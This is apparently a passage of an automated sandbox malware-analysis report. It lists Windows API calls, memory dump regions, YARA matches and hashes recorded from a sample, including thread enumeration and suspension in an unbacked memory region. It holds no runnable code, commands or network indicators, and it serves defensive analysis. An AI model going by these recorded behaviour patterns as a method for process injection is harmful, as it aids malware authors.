                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID: Y`l=
                                                                                                                        • API String ID: 2422867632-1320565934

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph, image not preserved. Entry block 5940a5b-5940ab2; labelled nodes: GetPEB, CreateThread.]
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 05940B27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID: ,
                                                                                                                        • API String ID: 2422867632-3772416878
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008758D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap
                                                                                                                        • API String ID: 0-1450471538
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,00000000,?,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000), ref: 008F5FCA
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F5FE7
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6005
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6013
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6022
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F603C
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F604A
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6054
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F606E
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F607C
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6086
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60A4
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60B2
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60C0
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60DE
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60EC
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60FA
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6118
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6126
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6134
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6152
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6160
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F616E
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F618C
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F619A
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F61A8
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F61C6
                                                                                                                        • VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F61D4
                                                                                                                        • GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F61E2
                                                                                                                        • Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6200
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocErrorLastSleepVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2288223010-0
                                                                                                                        • Opcode ID: 0d06327de0ecb5ea6dcb9e6450919807fe3be375993fd709472d07e39047ea63
                                                                                                                        • Instruction ID: 1c96bc254db2bba3be362c74b9ffdcc8534d18a638db5fd6e94cb72665b0989f
                                                                                                                        • Opcode Fuzzy Hash: 0d06327de0ecb5ea6dcb9e6450919807fe3be375993fd709472d07e39047ea63
                                                                                                                        • Instruction Fuzzy Hash: 2851313025960AEFDF251FB2DC0DA7A3B69FB41366F244528F70AD50A0EB318951EF51

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,008F495E,008F56C4,?,?,008F5F3D,00000002,00000000,?,?,00000000,?,?), ref: 008F621D
                                                                                                                        Strings
                                                                                                                        • SetSystemPagesAccessInternal, xrefs: 008F62E7
                                                                                                                        • page_allocator_internals_win.h, xrefs: 008F62E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeVirtual
                                                                                                                        • String ID: SetSystemPagesAccessInternal$page_allocator_internals_win.h
                                                                                                                        • API String ID: 1263568516-1640390853
                                                                                                                        • Opcode ID: b715aa8ba6fb8c48004b5768ffecc4e745a35a9c19aeaccf151b9fa2bffd5346
                                                                                                                        • Instruction ID: ed9d95f9ae49529209b1c2f073d649fb71037c7fd2234ddefc9376776e89e6d2
                                                                                                                        • Opcode Fuzzy Hash: b715aa8ba6fb8c48004b5768ffecc4e745a35a9c19aeaccf151b9fa2bffd5346
                                                                                                                        • Instruction Fuzzy Hash: FCA1E571A0820DEBEB189B79DC55B3A7369FB50309F144229F70ADB2C1FA34DD209B95

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008F8780: GetCurrentProcess.KERNEL32(?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8795
                                                                                                                          • Part of subcall function 008F8780: IsWow64Process.KERNEL32(00000000,00963608,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F87A1
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,00000000,?,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000), ref: 008F5FCA
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F5FE7
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 008F63B2
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6005
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6013
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6022
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F603C
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F604A
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6054
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F606E
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F607C
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6086
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60A4
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60B2
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60C0
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60DE
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60EC
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F60FA
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6118
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6126
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6134
                                                                                                                          • Part of subcall function 008F5FB0: Sleep.KERNEL32(00000032,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6152
                                                                                                                          • Part of subcall function 008F5FB0: VirtualAlloc.KERNEL32(00002000,00000000,00000000,008F6386,?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F6160
                                                                                                                          • Part of subcall function 008F5FB0: GetLastError.KERNEL32(?,008F6386,00000000,00000000,00002000,00000001,?,00000000,00000000,?,?,?), ref: 008F616E
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,?,?,?), ref: 008F63D1
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 008F6549
                                                                                                                        • GetLastError.KERNEL32 ref: 008F65D7
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 008F645E
                                                                                                                          • Part of subcall function 00931AD0: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,?,008F6626,?,?,?,?,?,00000000,00000000,?,?,?), ref: 00931ADB
                                                                                                                          • Part of subcall function 00931AD0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,008F6626,?,?,?,?,?,00000000,00000000,?,?,?), ref: 00931B07
                                                                                                                          • Part of subcall function 00931AD0: ReleaseSRWLockExclusive.KERNEL32(00972AD0,?,008F6626,?,?,?,?,?,00000000,00000000,?,?,?), ref: 00931B2E
                                                                                                                        • GetLastError.KERNEL32 ref: 008F647B
                                                                                                                        • GetLastError.KERNEL32 ref: 008F649D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 008F65F1
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000040,00004000), ref: 008F6776
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastVirtual$Alloc$Sleep$Free$ExclusiveLockProcess$AcquireCurrentReleaseWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 264247703-0
                                                                                                                        • Opcode ID: 18e3dd91e0a0fc20d94d6b02e21c215f6e444be51b1160288adc42477072713b
                                                                                                                        • Instruction ID: 7953b99f2fbbc8f8e9383fbd5ec51bf9792d5278fd0f0bb5954f16e8628cc709
                                                                                                                        • Opcode Fuzzy Hash: 18e3dd91e0a0fc20d94d6b02e21c215f6e444be51b1160288adc42477072713b
                                                                                                                        • Instruction Fuzzy Hash: 2BB1F471A1820EDBEB189F39DC55B3A7369FB50309F144229FB06DB281FA34DD209B95

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv
                                                                                                                        • String ID: first$size$span$span
                                                                                                                        • API String ID: 3732870572-3774232114

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph: first basic block 5940bab-5940bf2 (graph not reproduced)
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,059406F1,?,00000001,?,81EC8B55,000000FF), ref: 05940BE9
                                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 05940C15
                                                                                                                        • Wow64SuspendThread.KERNEL32(00000000), ref: 05940C68
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 05940C92
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 05940CC6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ChangeCloseFindNotification$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1145194703-0

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph: first basic block 59a1705-59a1718 (graph not reproduced)
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,?), ref: 059A1797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: .dll
                                                                                                                        • API String ID: 1029625771-2738580789

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph: first basic block 8f8780-8f8784 (graph not reproduced)
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008F8860: TryAcquireSRWLockExclusive.KERNEL32(00973F50,?,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8869
                                                                                                                          • Part of subcall function 008F8860: ReleaseSRWLockExclusive.KERNEL32(00973F50,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F88A8
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8795
                                                                                                                        • IsWow64Process.KERNEL32(00000000,00963608,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F87A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLockProcess$AcquireCurrentReleaseWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2898688079-0

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph: first basic block 8f8860-8f8871 (graph not reproduced)
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00973F50,?,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8869
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00973F50,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F88A8
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1678258262-0

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph: first basic block 91e06b-91e07f (graph not reproduced)
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000001,?,009125CC,0086D9CE,00941354,..\..\third_party\libc++\src\include\string:1229: assertion __pos <= size() failed: string index out of bounds,00000002,?,?,?), ref: 0091E06F
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,00000005,000000FF), ref: 0091E111
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
